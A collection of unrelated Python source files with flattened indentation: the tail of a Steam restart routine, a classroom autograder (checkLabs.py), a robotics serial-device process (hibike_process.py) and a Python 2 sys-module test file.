label = tk.Label(self, textvariable=label_var, bg=self['bg'], fg=get_color('text'))
label.pack(pady=(150, 0))
def cleanup():
label.destroy()
button_frame.destroy()
self.refresh(no_frame=True)
self.bottomframe.pack(side='bottom', fill='x')
show_update()
self.update()
queue = q.Queue()
if steam_running():
label_var.set(_('Waiting for Steam to exit...'))
if get_config('try_soft_shutdown') == 'false':
forcequit()
elif get_config('try_soft_shutdown') == 'true':
print('Soft shutdown mode')
if get_config('steam_path') == 'reg':
r_path = fetch_reg('SteamExe')
r_path_items = r_path.split('/')
else:
r_path = get_config('steam_path') + '\\Steam.exe'
r_path_items = r_path.split('\\')
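# Wrap any path segment containing spaces in quotes so the shell 'start'
# command can resolve the Steam.exe path correctly.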
path_items = []
for item in r_path_items:
if ' ' in item:
path_items.append(f'"{item}"')
else:
path_items.append(item)
steam_exe = "\\".join(path_items)
print('Steam.exe path:', steam_exe)
subprocess.run(f"start {steam_exe} -shutdown", shell=True,
creationflags=0x08000000, check=True)
print('Shutdown command sent. Waiting for Steam...')
def steam_checker():
nonlocal queue
sleep(1)
while True:
if t.stopped():
break
if steam_running():
sleep(1)
continue
else:
queue.put(1)
break
def cancel():
t.stop()
cleanup()
return
t = StoppableThread(target=steam_checker)
t.start()
cancel_button.update_command(cancel)
else:
queue.put(1)
counter = 0
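# Poll the queue once per second: when the checker thread (or the branch
# above) signals that Steam has exited, launch Steam again. After roughly
# ten seconds of waiting, re-enable the Cancel / Force quit buttons.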
def launch_steam():
nonlocal queue
nonlocal counter
try:
queue.get_nowait()
label_var.set(_('Launching Steam...'))
self.update()
print('Launching Steam...')
subprocess.run("start steam://open/main",
shell=True, check=True)
if get_config('autoexit') == 'true':
self.exit_app()
elif not refresh_override:
cleanup()
except q.Empty:
counter += 1
if counter == 10:
enable_button()
self.after(1000, launch_steam)
self.after(2000, launch_steam)
|
checkLabs.py
|
import shutil
import os
import sys
import importlib
import unittest
import copy
from collections import defaultdict
from io import StringIO
import threading
import inspect
import ctypes
import argparse
class KillableThread(threading.Thread):
def _get_my_tid(self):
"""determines this (self's) thread id"""
if not self.is_alive():
raise threading.ThreadError("the thread is not active")
# do we have it cached?
if hasattr(self, "_thread_id"):
return self._thread_id
# no, look for it in the _active dict
for tid, tobj in threading._active.items():
if tobj is self:
self._thread_id = ctypes.c_long(tid)
return ctypes.c_long(tid)
raise AssertionError("could not determine the thread's id")
def raise_exc(self, exctype):
"""raises the given exception type in the context of this thread"""
if not inspect.isclass(exctype):
raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(self._get_my_tid(), ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(self._get_my_tid(), 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
def terminate(self):
"""raises SystemExit in the context of the given thread, which should
cause the thread to exit silently (unless caught)"""
self.raise_exc(SystemExit)
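# Usage sketch (illustrative only, not part of the grading pipeline below):
# a KillableThread is started like a normal thread and asked to stop by
# injecting an exception into it, e.g.
#
#   t = KillableThread(target=some_long_running_function)  # hypothetical target
#   t.start()
#   t.join(timeout=5)
#   if t.is_alive():
#       t.raise_exc(TimeoutException)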
class TimeoutException(Exception):
pass
def getArgs():
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--targetDirectory",
help="directory containing all the students' submissions from Blackboard.",
default="./"
)
parser.add_argument("-o", "--output",
help="the file to output results",
default="./output.txt"
)
parser.add_argument("-t", "--tester",
help="the tester file to use",
default=None
)
parser.add_argument("-to", "--timeout",
help="How much time to give each student",
type=int,
default=5
)
parser.add_argument("-v", "--verbosity",
action="count",
default=0,
help="increase output verbosity"
)
parser.add_argument("-s", "--seed",
type=int,
default=None,
help="Seed to use"
)
parser.add_argument("-tpt", "--timeoutPerTest",
action="count",
default=0,
help="If enabled we wait timeout per test instead of timeout per student (default)"
)
parser.add_argument("-p", "--plugins",
help="the plugins to use",
default=''
)
args = parser.parse_args()
return args
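# Example invocation (illustrative; file names are placeholders):
#   python checkLabs.py -d ./submissions -t lab_tester.py -o results.txt -to 10 -v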
def files_list(directory):
info = os.walk(directory)
filenames = []
for (parent, b, filez) in info:
for file in filez:
if file != '__init__.py':
yield os.path.join(parent, file)
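# NOTE: when the scanned folder has no __init__.py, this creates an empty one
# in the current working directory rather than in `parent`.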
if '__init__.py' not in filez:
open('__init__.py', 'a').close()
def catchIO(function):
def wrapper(*args,**kwargs):
# Store the values of stdin/stdout/stderr
old_stdout = sys.stdout
old_stderr = sys.stderr
old_stdin = sys.stdin
# Set stdin/stdout/stderr to a StringIO
sys.stdout = mystdout = StringIO()
sys.stderr = mystderr = StringIO()
# Set the stdin just to speed things up
# Note that we can't kill the thread if waiting for input()...
sys.stdin = StringIO('A' * 100)
error = None
output = None
try:
output = function(*args,**kwargs)
except Exception as e:
error = e
finally:
# Restore the values of stdin/stdout/stderr
sys.stdout = old_stdout
sys.stderr = old_stderr
sys.stdin = old_stdin
stdoutput = mystdout.getvalue()
stderroutput = mystderr.getvalue()
return output, stdoutput, stderroutput, error
return wrapper
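# Usage sketch for catchIO (illustrative): wrap any callable to capture its
# return value, stdout, stderr and any raised exception in one call, e.g.
#   result, out_text, err_text, error = catchIO(some_function)(arg1, arg2)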
def runFile(studentFilename, tester, allFiles, stdinput='', plugins = [], **kwargs):
'''
Runs a student's file through the tester
Modifies allFiles and adds studentFilename to the dict as a dict with keys:
'errors' - Number of tests that raised an error
'failures' - Number of tests with incorrect output
'numTests' - Number of tests in total
'passed' - Number of tests passed
'stdout' - The stdout of running the tests
'stderr' - The stderr of running the tests
'stdsuit' - Output produced by unittest
'grade' - The student's calculated grade on the scale 0.0-1.0 (multiply by 100 to get a percentage)
each stored as a tuple of length 2: the first entry for required tests, the second for extra credit
If there is a class called TheHardcodingTestSuite it will run all the tests in there too (optional)
'''
try:
allFiles[studentFilename] = defaultdict(tuple)
allFiles[studentFilename]['grade'] = 0
for p in plugins:
catchIO(p.init)(allFiles[studentFilename])
#keys = {'errors':(),'failures':(),'numTests':(),'passed':(),'stdout':(),'stderr':(),'suitError':(),'grade':0}
# Create dict to store results
print(studentFilename)
try:
# execute the student's file and catch output, and errors
data = open(studentFilename).read()
output, stdoutput, stderroutput, error = catchIO(exec)(data, globals())
# Add student's code to local scope (it needs to be in tester)
addErrors = set()
for functName in tester.REQUIRED_DEFNS + tester.SUB_DEFNS + tester.EXTRA_CREDIT_DEFNS:
try:
exec('tester.{funct} = {funct}'.format(funct=functName))
except NameError:
print('Add Error: %s' % functName)
addErrors.add(functName)
# create an object that can run tests.
testout = StringIO()
runner = unittest.TextTestRunner(stream=testout)
# define the suite of tests that should be run.
suites = []
suites.append(tester.TheTestSuite(tester.REQUIRED_DEFNS + tester.SUB_DEFNS))
suites.append(tester.TheExtraCreditTestSuite(tester.EXTRA_CREDIT_DEFNS))
try:
suites.append(tester.TheHardcodingTestSuite(tester.REQUIRED_DEFNS + tester.SUB_DEFNS + tester.EXTRA_CREDIT_DEFNS))
except AttributeError:
pass
for suite in suites:
# let the runner run the suite of tests.
ans, stdoutput, stderroutput, error = catchIO(runner.run)(suite)
# store the results
allFiles[studentFilename]['errors'] += (len(ans.errors),)
allFiles[studentFilename]['failures'] += (len(ans.failures),)
allFiles[studentFilename]['numTests'] += (ans.testsRun,)
allFiles[studentFilename]['passed'] += (ans.testsRun - len(ans.errors) - len(ans.failures),)
allFiles[studentFilename]['stdout'] += (stdoutput,)
allFiles[studentFilename]['stderr'] += (stderroutput,)
allFiles[studentFilename]['stdsuit'] += (testout.getvalue(),)
testout.truncate(0)
testout.seek(0)
for p in plugins:
catchIO(p.run)(data, allFiles[studentFilename])
except (TimeoutException, AttributeError):
pass
try:
# Calculate the grade
passed = allFiles[studentFilename]['passed']
allFiles[studentFilename]['grade'] = passed[0]*tester.weight_required + passed[1]*tester.weight_extra_credit
except IndexError:
# Calculate the grade
passed = allFiles[studentFilename]['passed']
allFiles[studentFilename]['grade'] = passed[0]*tester.weight_required
except SystemExit:
pass
finally:
# Remove student's code from local scope
for functName in tester.REQUIRED_DEFNS + tester.SUB_DEFNS + tester.EXTRA_CREDIT_DEFNS:
try:
exec('del tester.{funct}'.format(funct=functName))
exec('del globals()["{funct}"]'.format(funct=functName))
#exec('del locals()[{funct}]'.format(funct=functName))
except AttributeError as e:
print('Delete Error: AttributeError: %s' % e)
except NameError as e:
print('Delete Error: NameError: %s' % e)
# Cleanup plugins
for p in plugins:
catchIO(p.cleanup)(allFiles[studentFilename])
def runFiles(directory, testerFilename, timeout=5, timeoutPerTest=False, verbose = False, seed = None, pluginNames = []):
'''
Run all the files in directory and all subfolders using the given tester file
'''
# A dict from student files to a dict representing the result
files = {}
# Remove the extension and import the tester file
testerName = testerFilename.split('.')[0]
tester = importlib.import_module(testerName)
if seed is not None:
tester.SEED = seed
plugins = []
# Create a data dict to pass to the threads
data = {'studentFilename':None, 'tester':tester, 'allFiles':files, 'stdinput':'', 'plugins':plugins}
for pn in pluginNames:
pn = pn.split('.')[0]
plugin = importlib.import_module(pn)
plugins.append(plugin)
catchIO(plugin.start)(data, tester)
# Iterate over all of the students' files
for filename in files_list(directory):
if verbose: print('Running: %s' % (filename))
# Instantiate files[filename] to be an empty dict and add it to data
files[filename] = defaultdict(int)
data['studentFilename'] = filename
# Create and run a new thread
t = KillableThread(target=runFile, kwargs=data, daemon=True)
t.start()
# Wait for it to finish or for it to timeout
t.join(timeout=timeout)
# If the thread didn't finish, kill it
if t.is_alive():
if verbose: print('Timed out, killing thread')
while t.is_alive():
try:
t.raise_exc(TimeoutException)
if timeoutPerTest:
t.join(timeout=timeout)
else:
t.join(timeout=1)
except (threading.ThreadError, ValueError):
pass
if verbose: print('Thread killed')
if verbose: print('Finished All Tests')
for plugin in plugins:
catchIO(plugin.end)(data)
return files
def printResults(fileResults, outputfile, sort=True, seperator='\t'):
# Sort (or don't sort) the results
if sort:
resultList = sorted(fileResults.items(), key=lambda x: x[0])
else:
resultList = fileResults.items()
# Set the format string to None, it will be updated on the first loop
formatStr = None
keys = []
with open(outputfile, 'w') as o:
for file, result in resultList:
# Copy the results to data
data = copy.deepcopy(result)
# Calculate filename, parent, and grandparent folders
parent, file = os.path.split(file)
gparent, lab = os.path.split(parent)
try:
# Try to parse the section, username and lab ID (or project ID) from the filename
data['section'], data['username'], data['labID'] = file.split('_')
data['labID'] = data['labID'].split('.')[0]
except ValueError:
# Parse error, just set the labID to the filename
data['labID'] = file
data['section'], data['username'] = None, None
# Split multiple results into individual keys in the data
for key, val in result.items():
try:
if not isinstance(val, str) and len(val) >= 2:
try:
del data[key]
except KeyError:
pass
# Append the first key with '-r' (required),
# the second with '-ec' (extra credit),
# and the others with their number
data['%s-r' % key] = val[0]
data['%s-ec' % key] = val[1]
for i in range(2, len(val)):
data['%s-%d' % (key, i)] = val[i]
except TypeError:
pass
# Set the format string to create a header row
if formatStr is None:
formatStr = ''
for key in data:
keys.append(key)
if key.startswith('std'):
formatStr += '{%s!r}%s' % (key, seperator)
else:
formatStr += '{%s}%s' % (key, seperator)
formatStr = formatStr[:-1] + '\n'
o.write(seperator.join(keys) + '\n')
# Add missing keys
for key in keys:
if key not in data:
data[key] = None
# Write the data to the file
o.write(formatStr.format(**data))
def main():
# Parse arguments
args = getArgs()
verbose_level = args.verbosity
verbose = verbose_level > 0
directory = args.targetDirectory
outputfile = args.output
testerFile = args.tester
timeout = args.timeout
seed = args.seed
timeoutPerTest = args.timeoutPerTest
pluginNames = args.plugins.split(',')
pluginNames = [x.strip() for x in pluginNames if x.strip()]
# Run the files
fileResults = runFiles(directory=directory, verbose=verbose, testerFilename=testerFile, timeout=timeout, timeoutPerTest=timeoutPerTest, seed=seed, pluginNames=pluginNames)
# Output results to a file
printResults(fileResults, outputfile)
print('Done!')
if __name__ == "__main__":
main()
|
hibike_process.py
|
"""
The main Hibike process.
"""
from collections import namedtuple
import glob
import multiprocessing
import os
import queue
import random
import threading
import time
import sys
#from PieCentral.runtime.runtimeUtil import *
# from runtimeUtil import *
# pylint: disable=import-error
import hibike_message as hm
import serial
__all__ = ["hibike_process"]
# 0.04 second (40 ms) sleep interval matches the rate we subscribe to devices at
BATCH_SLEEP_TIME = .04
# Time in seconds to wait until reading from a potential sensor
IDENTIFY_TIMEOUT = 1
# Time in seconds to wait between checking for new devices
# and cleaning up old ones.
HOTPLUG_POLL_INTERVAL = 1
def get_working_serial_ports(excludes=()):
"""
Scan for open COM ports, except those in EXCLUDES.
Returns:
A list of serial port objects (`serial.Serial`) and port names.
"""
excludes = set(excludes)
# Last command is included so that it's compatible with OS X Sierra
# Note: If you are running OS X Sierra, do not access the directory through vagrant ssh
# Instead access it through Volumes/vagrant/PieCentral
ports = set(glob.glob("/dev/ttyACM*") + glob.glob("/dev/ttyUSB*")
+ glob.glob("/dev/tty.usbmodem*"))
ports.difference_update(excludes)
try:
virtual_device_config_file = os.path.join(os.path.dirname(__file__), "virtual_devices.txt")
ports.update(open(virtual_device_config_file, "r").read().split())
except IOError:
pass
serials = []
port_names = []
for port in ports:
try:
serials.append(serial.Serial(port, 115200))
port_names.append(port)
except serial.serialutil.SerialException:
print("Cannot Open Serial Port: " + str(port))
return serials, port_names
def identify_smart_sensors(serial_conns):
"""
Given a list of serial port connections, figure out which
contain smart sensors.
Returns:
A map of serial port names to UIDs.
"""
def recv_subscription_response(conn, uid_queue, stop_event):
"""
Place received subscription response UIDs from CONN into UID_QUEUE,
stopping when STOP_EVENT is set.
"""
try:
for packet in hm.blocking_read_generator(conn, stop_event):
msg_type = packet.get_message_id()
if msg_type == hm.MESSAGE_TYPES["SubscriptionResponse"]:
_, _, uid = hm.parse_subscription_response(packet)
uid_queue.put(uid)
except serial.SerialException:
pass
device_map = {}
candidates = []
for conn in serial_conns:
old_timeout = conn.write_timeout
conn.write_timeout = IDENTIFY_TIMEOUT
try:
hm.send(conn, hm.make_ping())
except serial.SerialTimeoutException:
continue
finally:
conn.write_timeout = old_timeout
maybe_device = namedtuple("MaybeDevice", ["serial_conn", "queue", "event", "thread"])
maybe_device.queue = queue.Queue()
maybe_device.event = threading.Event()
maybe_device.serial_conn = conn
maybe_device.thread = threading.Thread(target=recv_subscription_response,
args=(conn, maybe_device.queue, maybe_device.event))
candidates.append(maybe_device)
for cand in candidates:
cand.thread.start()
for cand in candidates:
try:
uid = cand.queue.get(block=True, timeout=IDENTIFY_TIMEOUT)
device_map[cand.serial_conn.name] = uid
# Shut device up
hm.send(cand.serial_conn, hm.make_subscription_request(uid, [], 0))
except queue.Empty:
pass
for cand in candidates:
cand.event.set()
cand.thread.join()
return device_map
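# Typical pairing of the two discovery helpers (as done in hibike_process
# below):
#   serials, port_names = get_working_serial_ports()
#   uids_by_port = identify_smart_sensors(serials)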
def spin_up_device(serial_port, uid, state_queue, batched_data, error_queue):
"""
Spin up a device with a given UID on SERIAL_PORT.
Returns:
The new device.
"""
pack = namedtuple("Threadpack", ["read_thread", "write_thread",
"write_queue", "serial_port", "instance_id"])
pack.write_queue = queue.Queue()
pack.serial_port = serial_port
pack.write_thread = threading.Thread(target=device_write_thread,
args=(serial_port, pack.write_queue))
pack.read_thread = threading.Thread(target=device_read_thread,
args=(uid, pack, error_queue,
state_queue, batched_data))
# This is an ID that does not persist across disconnects,
# so that we can tell when a device has been reconnected.
pack.instance_id = random.getrandbits(128)
pack.write_thread.start()
pack.read_thread.start()
return pack
def hotplug(devices, state_queue, batched_data, error_queue):
"""
Remove disconnected devices and scan for new ones.
"""
clean_up_queue = queue.Queue()
clean_up_thread = threading.Thread(target=clean_up_devices, args=(clean_up_queue, ))
clean_up_thread.start()
while True:
time.sleep(HOTPLUG_POLL_INTERVAL)
scan_for_new_devices(devices, state_queue, batched_data, error_queue)
remove_disconnected_devices(error_queue, devices, clean_up_queue, state_queue)
def scan_for_new_devices(existing_devices, state_queue, batched_data, error_queue):
"""
Find devices that are on serial ports not in EXISTING_DEVICES, and add
any that have been found to it.
"""
ports, names = get_working_serial_ports(map(lambda d: d.serial_port.name,
existing_devices.values()))
sensors = identify_smart_sensors(ports)
for (ser, uid) in sensors.items():
idx = names.index(ser)
port = ports[idx]
pack = spin_up_device(port, uid, state_queue, batched_data, error_queue)
existing_devices[uid] = pack
# Tell the device to start sending data
pack.write_queue.put(("ping", []))
pack.write_queue.put(("subscribe", [1, 0, []]))
def clean_up_devices(device_queue):
"""
Clean up associated resources of devices in the queue.
Closing a serial port can take a very long time (30 seconds or more).
It's best to spin this function off into its own thread,
so that you're not blocked on reclaiming resources.
"""
while True:
device = device_queue.get()
device.serial_port.close()
device.read_thread.join()
device.write_thread.join()
def remove_disconnected_devices(error_queue, devices, clean_up_queue, state_queue):
"""
Clean up any disconnected devices in ERROR_QUEUE.
"""
next_time_errors = []
while True:
try:
error = error_queue.get(block=False)
pack = devices[error.uid]
if not error.accessed:
# Wait until the next cycle to make sure it's disconnected
error.accessed = True
next_time_errors.append(error)
continue
elif error.instance_id != pack.instance_id:
# The device has reconnected in the meantime
continue
uid = error.uid
pack = devices[uid]
del devices[uid]
clean_up_queue.put(pack)
state_queue.put(("device_disconnected", [uid]))
except queue.Empty:
for err in next_time_errors:
error_queue.put(err)
return
# pylint: disable=too-many-branches, too-many-locals
# pylint: disable=too-many-arguments, unused-argument
def hibike_process(bad_things_queue, state_queue, pipe_from_child):
"""
Run the main hibike process.
"""
serials, serial_names = get_working_serial_ports()
smart_sensors = identify_smart_sensors(serials)
devices = {}
batched_data = {}
error_queue = queue.Queue()
for (ser, uid) in smart_sensors.items():
index = serial_names.index(ser)
serial_port = serials[index]
pack = spin_up_device(serial_port, uid, state_queue, batched_data, error_queue)
devices[uid] = pack
batch_thread = threading.Thread(target=batch_data, args=(batched_data, state_queue))
batch_thread.start()
hotplug_thread = threading.Thread(target=hotplug,
args=(devices, state_queue, batched_data, error_queue))
hotplug_thread.start()
# Pings all devices and tells them to stop sending data
for pack in devices.values():
pack.write_queue.put(("ping", []))
pack.write_queue.put(("subscribe", [1, 0, []]))
# the main thread reads instructions from statemanager and
# forwards them to the appropriate device write threads
path = os.path.dirname(os.path.abspath(__file__))
parent_path = path.rstrip("hibike")
runtime = os.path.join(parent_path, "runtime")
sys.path.insert(1, runtime)
import runtimeUtil
while True:
instruction, args = pipe_from_child.recv()
try:
if instruction == "enumerate_all":
for pack in devices.values():
pack.write_queue.put(("ping", []))
elif instruction == "subscribe_device":
uid = args[0]
if uid in devices:
devices[uid].write_queue.put(("subscribe", args))
elif instruction == "write_params":
uid = args[0]
if uid in devices:
devices[uid].write_queue.put(("write", args))
elif instruction == "read_params":
uid = args[0]
if uid in devices:
devices[uid].write_queue.put(("read", args))
elif instruction == "disable_all":
for pack in devices.values():
pack.write_queue.put(("disable", []))
elif instruction == "timestamp_down":
timestamp = time.perf_counter()
args.append(timestamp)
state_queue.put(("timestamp_up", args))
except KeyError as e:
bad_things_queue.put(runtimeUtil.BadThing(
sys.exc_info(),
str(e),
event=runtimeUtil.BAD_EVENTS.HIBIKE_NONEXISTENT_DEVICE))
except TypeError as e:
bad_things_queue.put(runtimeUtil.BadThing(
sys.exc_info(),
str(e),
event=runtimeUtil.BAD_EVENTS.HIBIKE_INSTRUCTION_ERROR))
def device_write_thread(ser, instr_queue):
"""
Send packets to SER based on instructions from INSTR_QUEUE.
"""
try:
while True:
instruction, args = instr_queue.get()
if instruction == "ping":
hm.send(ser, hm.make_ping())
elif instruction == "subscribe":
uid, delay, params = args
hm.send(ser, hm.make_subscription_request(hm.uid_to_device_id(uid), params, delay))
elif instruction == "read":
uid, params = args
hm.send(ser, hm.make_device_read(hm.uid_to_device_id(uid), params))
elif instruction == "write":
uid, params_and_values = args
hm.send(ser, hm.make_device_write(hm.uid_to_device_id(uid), params_and_values))
elif instruction == "disable":
hm.send(ser, hm.make_disable())
elif instruction == "heartResp":
uid = args[0]
hm.send(ser, hm.make_heartbeat_response())
except serial.SerialException:
# Device has disconnected
pass
def device_read_thread(uid, pack, error_queue, state_queue, batched_data):
"""
Read packets from SER and update queues and BATCHED_DATA accordingly.
"""
ser = pack.serial_port
instruction_queue = pack.write_queue
try:
while True:
for packet in hm.blocking_read_generator(ser):
message_type = packet.get_message_id()
if message_type == hm.MESSAGE_TYPES["SubscriptionResponse"]:
params, delay, uid = hm.parse_subscription_response(packet)
state_queue.put(("device_subscribed", [uid, delay, params]))
elif message_type == hm.MESSAGE_TYPES["DeviceData"]:
params_and_values = hm.parse_device_data(packet, hm.uid_to_device_id(uid))
batched_data[uid] = params_and_values
elif message_type == hm.MESSAGE_TYPES["HeartBeatRequest"]:
instruction_queue.put(("heartResp", [uid]))
except serial.SerialException:
error = namedtuple("Disconnect", ["uid", "instance_id", "accessed"])
error.uid = uid
error.instance_id = pack.instance_id
error.accessed = False
error_queue.put(error)
def batch_data(data, state_queue):
"""
Write out DATA to STATE_QUEUE periodically.
"""
while True:
time.sleep(BATCH_SLEEP_TIME)
state_queue.put(("device_values", [data]))
#############
## TESTING ##
#############
# pylint: disable=invalid-name
if __name__ == "__main__":
# helper functions so we can spawn threads that try to read/write to hibike_devices periodically
def set_interval_sequence(functions, sec):
"""
Create a thread that executes FUNCTIONS after SEC seconds.
"""
def func_wrapper():
"""
Execute the next function in FUNCTIONS after SEC seconds.
Cycles through all functions.
"""
set_interval_sequence(functions[1:] + functions[:1], sec)
functions[0]()
t = threading.Timer(sec, func_wrapper)
t.start()
return t
def make_send_write(pipe_to_child, uid, params_and_values):
"""
Create a function that sends UID and PARAMS_AND_VALUES
to PIPE_TO_CHILD.
"""
def helper():
"""
Helper function.
"""
pipe_to_child.send(["write_params", [uid, params_and_values]])
return helper
to_child, from_child = multiprocessing.Pipe()
main_error_queue = multiprocessing.Queue()
main_state_queue = multiprocessing.Queue()
newProcess = multiprocessing.Process(target=hibike_process,
name="hibike_sim",
args=[main_error_queue, main_state_queue, from_child])
newProcess.daemon = True
newProcess.start()
to_child.send(["enumerate_all", []])
uids = set()
while True:
print("waiting for command")
command, main_args = main_state_queue.get()
if command == "device_subscribed":
dev_uid = main_args[0]
if dev_uid not in uids:
uids.add(dev_uid)
if hm.DEVICES[hm.uid_to_device_id(dev_uid)]["name"] == "YogiBear":
set_interval_sequence([
make_send_write(to_child, dev_uid, [("duty_cycle", 0)]),
make_send_write(to_child, dev_uid, [("duty_cycle", 0.5)]),
make_send_write(to_child, dev_uid, [("duty_cycle", 1.0)]),
make_send_write(to_child, dev_uid, [("duty_cycle", 0)]),
make_send_write(to_child, dev_uid, [("duty_cycle", -0.5)]),
make_send_write(to_child, dev_uid, [("duty_cycle", -1.0)]),
make_send_write(to_child, dev_uid, [("duty_cycle", 0)])
], 0.75)
elif hm.DEVICES[hm.uid_to_device_id(dev_uid)]["name"] == "ServoControl":
set_interval_sequence([
make_send_write(to_child, dev_uid,
[("servo0", 1), ("enable0", False),
("servo1", 21), ("enable1", True),
("servo2", 30), ("enable2", True),
("servo3", 8), ("enable3", True)]),
make_send_write(to_child, dev_uid,
[("servo0", 5), ("enable0", False),
("servo1", 5), ("enable1", True),
("servo2", 5), ("enable2", True),
("servo3", 5), ("enable3", False)]),
make_send_write(to_child, dev_uid,
[("servo0", 1), ("enable0", True),
("servo1", 26), ("enable1", True),
("servo2", 30), ("enable2", False),
("servo3", 17), ("enable3", True)]),
make_send_write(to_child, dev_uid,
[("servo0", 13), ("enable0", False),
("servo1", 7), ("enable1", False),
("servo2", 24), ("enable2", True),
("servo3", 10), ("enable3", True)]),
make_send_write(to_child, dev_uid,
[("servo0", 27), ("enable0", True),
("servo1", 2), ("enable1", False),
("servo2", 3), ("enable2", False),
("servo3", 14), ("enable3", False)]),
make_send_write(to_child, dev_uid,
[("servo0", 20), ("enable0", True),
("servo1", 12), ("enable1", False),
("servo2", 20), ("enable2", False),
("servo3", 29), ("enable3", True)]),
], 1)
parameters = []
for param in hm.DEVICES[hm.uid_to_device_id(dev_uid)]["params"]:
parameters.append(param["name"])
to_child.send(["subscribe_device", [dev_uid, 10, parameters]])
elif command == "device_values":
print("%10.2f, %s" % (time.time(), str(main_args)))
|
test_sys.py
|
# expected: fail
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
from test.script_helper import assert_python_ok, assert_python_failure
import sys, os, cStringIO
import struct
import operator
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.test_support.reap_children()
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is not None)
self.assertTrue(value is exc)
self.assertTrue(traceback is not None)
with test.test_support.check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is None)
self.assertTrue(value is None)
self.assertTrue(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assertTrue(typ1 is typ2)
self.assertTrue(value1 is exc)
self.assertTrue(value1 is value2)
self.assertTrue(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
# both unnormalized...
rc, out, err = assert_python_failure('-c', 'raise SystemExit, 46')
self.assertEqual(rc, 46)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# ... and normalized
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (repr(err), repr(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
self.assertRaises(OverflowError, sys.setrecursionlimit, 1 << 31)
try:
sys.setrecursionlimit((1 << 31) - 5)
try:
# issue13546: isinstance(e, ValueError) used to fail
# when the recursion limit is close to 1<<31
raise ValueError()
except ValueError, e:
pass
finally:
sys.setrecursionlimit(oldlimit)
